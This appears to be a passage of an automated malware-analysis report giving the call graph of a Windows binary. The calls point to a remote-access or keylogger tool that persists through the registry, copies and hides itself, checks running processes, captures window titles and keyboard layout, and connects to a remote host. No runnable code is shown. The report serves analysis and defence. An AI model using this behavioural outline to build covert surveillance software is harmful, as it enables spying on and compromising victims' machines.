??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15874->15875 15875->15629 15877 40a167 15876->15877 15894 40a1a1 15876->15894 15878 40a1b6 15877->15878 15879 40a17b 15877->15879 15880 40a208 15878->15880 15887 40a1ca 15878->15887 16304 40a2a7 15879->16304 15882 40184b 2 API calls 15880->15882 15885 40a215 15882->15885 15884 40184b 2 API calls 15884->15894 16308 4018db ??3@YAXPAX 15885->16308 15889 40a2a7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 15887->15889 15888 40a229 15890 4018c8 ??2@YAPAXI 15888->15890 15891 40a1f0 15889->15891 15892 40a23a 15890->15892 15893 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15891->15893 15895 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15892->15895 15893->15894 15894->15631 15895->15894 15897 40184b 2 API calls 15896->15897 15898 4017eb 15897->15898 16309 4018db ??3@YAXPAX 15898->16309 15900 4017ff 15900->15634 15900->15635 15902 401818 15901->15902 15904 401826 15902->15904 16310 401895 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 15902->16310 15904->15638 15906 40b4f1 RegQueryValueExA RegCloseKey 15905->15906 15907 40b51e 15905->15907 15906->15654 15907->15654 15909 409935 GetModuleHandleA GetProcAddress 15908->15909 15910 409949 LoadLibraryA GetProcAddress 15908->15910 15909->15910 15911 409966 GetModuleHandleA GetProcAddress 15910->15911 15912 40997a 18 API calls 15910->15912 15911->15912 15912->15669 15914 412af8 GetCurrentProcess 15913->15914 15915 408f3a 15913->15915 15914->15915 15916 40b522 15915->15916 15917 40b53e RegOpenKeyExA 15916->15917 15919 40b58a 15917->15919 15920 40b55b RegQueryValueExA RegCloseKey 15917->15920 15921 40b593 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15919->15921 15920->15921 15921->15673 15922->15693 15924 40b913 15923->15924 15925 40309e 4 API calls 15924->15925 15926 40b928 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15925->15926 15927 40b708 7 API calls 15926->15927 15928 40b948 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15927->15928 15928->15724 15930 40b767 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15929->15930 15931 40b71f ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 15929->15931 15930->15740 15932 40b756 15931->15932 15933 40b758 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15931->15933 15932->15933 15933->15740 15934->15763 15935->15781 15937 413731 12 API calls 15936->15937 15938 413604 15936->15938 15937->15788 15939 413615 15938->15939 15940 41360b _wgetenv ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15938->15940 15941 413648 15938->15941 16314 412100 GetModuleFileNameW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15939->16314 15940->15937 15943 412aeb GetCurrentProcess 15941->15943 15945 41364d 15943->15945 15947 413651 7 API calls 15945->15947 15948 4136b2 7 API calls 15945->15948 15946 413621 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15949 4136aa ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15946->15949 15947->15949 15948->15949 15949->15937 15951 412183 6 API calls 15950->15951 15951->15832 16315 412407 15952->16315 15954 40c834 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 15955 40180c 4 API calls 15954->15955 15956 40c853 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15955->15956 15957 40c876 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15956->15957 15958 40c869 Sleep 15956->15958 15959 40180c 4 API calls 15957->15959 15958->15957 15960 40c892 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15959->15960 15961 4129eb 21 API calls 15960->15961 16021 40c8a7 15961->16021 15964 40180c 4 API calls 15965 40c8df ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15964->15965 15966 4129eb 21 API calls 15965->15966 15969 40c8f4 15966->15969 15967 40180c 4 API calls 15967->15969 15968 40180c 4 API calls 15970 40c926 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15968->15970 15969->15967 15969->15968 15971 40180c 4 API calls 15969->15971 15972 41203b 13 API calls 15970->15972 15973 40c999 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ gethostbyname 15971->15973 15974 40c96c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15972->15974 15973->16021 15974->15969 15975 40180c 4 API calls 15976 40c9d5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi htons 15975->15976 15976->16021 15977 4017dd 3 API calls 15977->16021 15978 40180c 4 API calls 15980 40d27c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi Sleep 15978->15980 15979 40ca34 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 15979->16021 15980->16021 15981 40180c 4 API calls 15983 40ca08 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15981->15983 15983->16021 15984 40180c 4 API calls 15984->16021 15985 40180c 4 API calls 15986 40ca85 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15985->15986 15987 41203b 13 API calls 15986->15987 15988 40cac8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15987->15988 16325 402580 15988->16325 15993 40180c 4 API calls 15994 40cb4c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15993->15994 15995 40b692 3 API calls 15994->15995 15999 40cb94 15995->15999 15996 40cb9b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 15996->15999 15997 40cbbd ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16334 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 15997->16334 15999->15996 15999->15997 16000 40cbf0 16002 40180c 4 API calls 16000->16002 16335 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16000->16335 16003 40cc19 GetTickCount 16002->16003 16336 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16003->16336 16008 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16009 40cc33 16008->16009 16009->16008 16337 41269b 16009->16337 16339 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16009->16339 16340 412660 GetForegroundWindow GetWindowTextW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16009->16340 16341 409e7d GetLocaleInfoA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16009->16341 16342 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16009->16342 16012 40ccf8 38 API calls 16343 4020c2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16012->16343 16014 40cf62 50 API calls 16346 402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 16014->16346 16016 40d1ee 16357 405cca 16016->16357 16018 40d1c8 16018->16016 16019 40d1fd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16018->16019 16020 41203b 13 API calls 16019->16020 16020->16021 16021->15975 16021->15977 16021->15978 16021->15979 16021->15981 16021->15984 16021->15985 16022 40d246 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16021->16022 16023 40d236 CreateThread 16021->16023 16318 402038 16021->16318 16324 40209b connect 16021->16324 16022->16021 16023->16022 16025 412795 7 API calls 16024->16025 16026 40b98f ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16025->16026 16027 412795 7 API calls 16026->16027 16028 40b9a7 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16027->16028 16029 40b9e8 2 API calls 16028->16029 16030 40b9ba ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16029->16030 16030->15661 16032 40b692 3 API calls 16031->16032 16033 40a977 16032->16033 16034 40a985 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 16033->16034 16035 40a97e exit 16033->16035 16036 412ddf 6 API calls 16034->16036 16035->16034 16037 40a9a2 16036->16037 16038 40a9a8 exit 16037->16038 16039 40a9af OpenProcess WaitForSingleObject CloseHandle GetCurrentProcessId ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16037->16039 16038->16039 17074 40b829 RegCreateKeyA 16039->17074 16041 40ab28 exit 16044 40ab30 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16041->16044 16042 40a9f9 PathFileExistsW 16043 40aa0a ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16042->16043 16048 40a9ee 16042->16048 16045 412d56 4 API calls 16043->16045 16047 40ab5d ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16044->16047 16066 40abe2 16044->16066 16045->16048 16046 40aad2 ShellExecuteW 16050 40aad8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16046->16050 16049 40b692 3 API calls 16047->16049 16048->16039 16048->16041 16048->16042 16048->16046 16048->16050 16051 40aa48 GetTempPathW GetTempFileNameW lstrcatW ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16048->16051 16063 40ab10 Sleep 16048->16063 16064 40aafb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16048->16064 16052 40abaf 16049->16052 16053 40b4c8 3 API calls 16050->16053 16055 412d56 4 API calls 16051->16055 16056 40abb6 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 16052->16056 16057 40abc8 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16052->16057 16053->16048 16054 40abf4 Sleep 16058 40ac08 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16054->16058 16059 40ac2e ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16054->16059 16055->16048 16056->16057 16062 408e6f 16057->16062 16057->16066 17077 407d53 16058->17077 16061 40b8f8 13 API calls 16059->16061 16061->16066 16062->15647 16063->16048 16067 40b95b 17 API calls 16064->16067 16066->16054 16066->16062 16067->16048 16069 40b692 3 API calls 16068->16069 16070 40325f 16069->16070 16071 403266 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16070->16071 16075 4032a4 16070->16075 16072 40b708 7 API calls 16071->16072 16073 40328e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16072->16073 16074 40b95b 17 API calls 16073->16074 16074->16075 16075->15677 16077 409003 16076->16077 16078 40b49f RegQueryValueExA RegCloseKey 16076->16078 16077->15677 16077->15697 16078->16077 16080 403106 16079->16080 16081 4030ff 16079->16081 17095 4032b3 16080->17095 16081->15677 16083 40310b 16083->16081 16084 40b522 4 API calls 16083->16084 16085 40312f ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16084->16085 16086 40b8f8 13 API calls 16085->16086 16087 40317c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16086->16087 16088 40b7b9 7 API calls 16087->16088 16089 4031a6 16088->16089 16090 41358b 48 API calls 16089->16090 16091 4031b6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 16090->16091 16092 4031d7 exit 16091->16092 16093 4031de ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16091->16093 16092->16093 16093->16081 16094->15683 16095->15721 16096->15741 16097->15744 16098->15761 16100 407e56 6 API calls 16099->16100 16101 407ea8 16099->16101 16102 407ecb ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ wcscmp 16100->16102 16103 4135de 37 API calls 16101->16103 16105 407f19 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CopyFileW 16102->16105 16106 407eec ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16102->16106 16104 407eb7 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 16103->16104 16104->16102 16108 407fe0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16105->16108 16109 407f33 16105->16109 16107 407d53 16 API calls 16106->16107 16113 407f0f ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16107->16113 16110 407d53 16 API calls 16108->16110 16109->16108 16111 407f3d wcslen 16109->16111 16112 408003 16110->16112 16114 407f9a 16111->16114 16115 407f4e 16111->16115 16118 40800c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW wcslen 16112->16118 16119 40803d 6 API calls 16112->16119 16113->15715 16117 4135de 37 API calls 16114->16117 16116 4135de 37 API calls 16115->16116 16120 407f5d ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16116->16120 16121 407fa5 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 16117->16121 16118->16119 16122 40802d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 16118->16122 16123 4080a1 13 API calls 16119->16123 16124 40813e 15 API calls 16119->16124 16125 407fb4 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CopyFileW 16120->16125 16121->16125 16122->16119 16123->16124 16126 412d56 4 API calls 16124->16126 16125->16108 16128 407fd0 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 16125->16128 16127 4081fd 16126->16127 16129 408204 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 16127->16129 16130 40822e ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16127->16130 16128->16113 16129->16130 16131 408227 exit 16129->16131 16130->16113 16131->16130 17098 4139ea 16132->17098 16136 409a70 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ CreateToolhelp32Snapshot Process32FirstW Process32NextW 16135->16136 16137 409bdd 16135->16137 16138 409ab6 16136->16138 17109 4121e8 16137->17109 16140 409bbe CloseHandle ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16138->16140 16141 409abe ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16138->16141 16146 409afb ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0 16138->16146 16143 409c63 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16140->16143 16144 409bd4 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16140->16144 16141->16138 16142 409be6 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16145 412aeb GetCurrentProcess 16142->16145 16148 409c6c CreateMutexA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16143->16148 16144->16137 16147 409bff 16145->16147 16150 409b10 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE Process32NextW 16146->16150 16151 409b2a 16146->16151 16152 409c03 ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI 16147->16152 16153 409c37 ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ 16147->16153 16149 412ddf 6 API calls 16148->16149 16154 409c9f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16149->16154 16150->16138 17100 412b4a OpenProcess 16151->17100 16152->16153 16156 409c1f wcslen ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG 16152->16156 16153->16148 16157 409c4e 16153->16157 17114 40f3e2 16154->17114 16156->16153 16160 409cf2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16157->16160 16159 409b39 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16163 409b61 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16159->16163 16164 409b83 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16159->16164 16162 409306 16160->16162 16162->15708 16162->15718 16163->16162 16167 409b94 16164->16167 16168 409c55 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16164->16168 16165 409cc0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16169 40b829 3 API calls 16165->16169 16166 409ce4 CloseHandle 16170 409ce9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16166->16170 17106 412b15 16167->17106 16168->16144 16173 409cdd 16169->16173 16170->16160 16173->16170 16174 409ba8 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16174->16140 16176 40b6de 16175->16176 16177 40b6b6 RegQueryValueExA RegCloseKey 16175->16177 16176->15717 16177->16176 16179 413d55 16178->16179 16180 413d61 ShowWindow 16179->16180 16181 413d69 freopen printf 16179->16181 16180->16181 16181->15747 16182->15780 16183->15796 16185 40525c ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16184->16185 16186 40524c CreateThread 16184->16186 16185->15807 16186->16185 17139 405156 GetKeyboardLayout 16187->17139 16190 4051c6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16193 41203b 13 API calls 16190->16193 16191 4051af ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16192 405dd3 15 API calls 16191->16192 16192->16190 16194 4051ef CreateThread 16193->16194 16195 405216 CreateThread ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16194->16195 16196 40520a CreateThread 16194->16196 16195->15803 16196->16195 16198 412795 7 API calls 16197->16198 16199 4135ae ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16198->16199 16200 4135de 37 API calls 16199->16200 16201 4135c4 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16200->16201 16201->15837 16203 407a69 16202->16203 16204 407a2b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16202->16204 16205 407a79 CreateThread 16203->16205 16207 407a73 16203->16207 16206 40b47f 3 API calls 16204->16206 16205->16207 16208 407a4e 16206->16208 16207->15828 16208->16203 16209 407a55 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16208->16209 16210 40b4c8 3 API calls 16209->16210 16210->16203 16212 4120ec ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16211->16212 16213 41204e 11 API calls 16211->16213 16212->15851 16213->16212 16214->15858 16218 403010 16215->16218 16219 403039 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16218->16219 16219->15861 16220->15864 16222 41384b 16221->16222 16231 41385c 16222->16231 16224 412a6a ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16224->15865 16224->15866 16226 41380c 16225->16226 16227 4018c8 ??2@YAPAXI 16226->16227 16228 413814 16227->16228 16229 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16228->16229 16230 412ac1 16229->16230 16230->15874 16232 413868 16231->16232 16235 413891 16232->16235 16234 41387f 16234->16224 16236 41395e 16235->16236 16244 4138b0 16235->16244 16237 41396c 16236->16237 16239 4139ad 16236->16239 16238 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16237->16238 16240 41397e 16238->16240 16241 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16239->16241 16261 413937 16239->16261 16242 40186d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16240->16242 16243 4139c0 16241->16243 16245 413997 16242->16245 16282 413a6d 16243->16282 16262 4018c8 16244->16262 16278 413a4e 16245->16278 16250 413a4e ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16250->16261 16256 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16257 413916 16256->16257 16273 40184b 16257->16273 16261->16234 16285 40190f 16262->16285 16264 4018d5 16265 40a27b 16264->16265 16266 40a285 16265->16266 16267 40a29e 16266->16267 16288 4018eb 16266->16288 16269 40186d 16267->16269 16270 40187b 16269->16270 16271 40188f 16269->16271 16270->16271 16272 4018eb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16270->16272 16271->16256 16272->16270 16274 401855 16273->16274 16275 401867 16274->16275 16295 4018ff 16274->16295 16277 4018db ??3@YAXPAX 16275->16277 16277->16261 16279 413a55 16278->16279 16280 413a6a 16279->16280 16281 413a5a 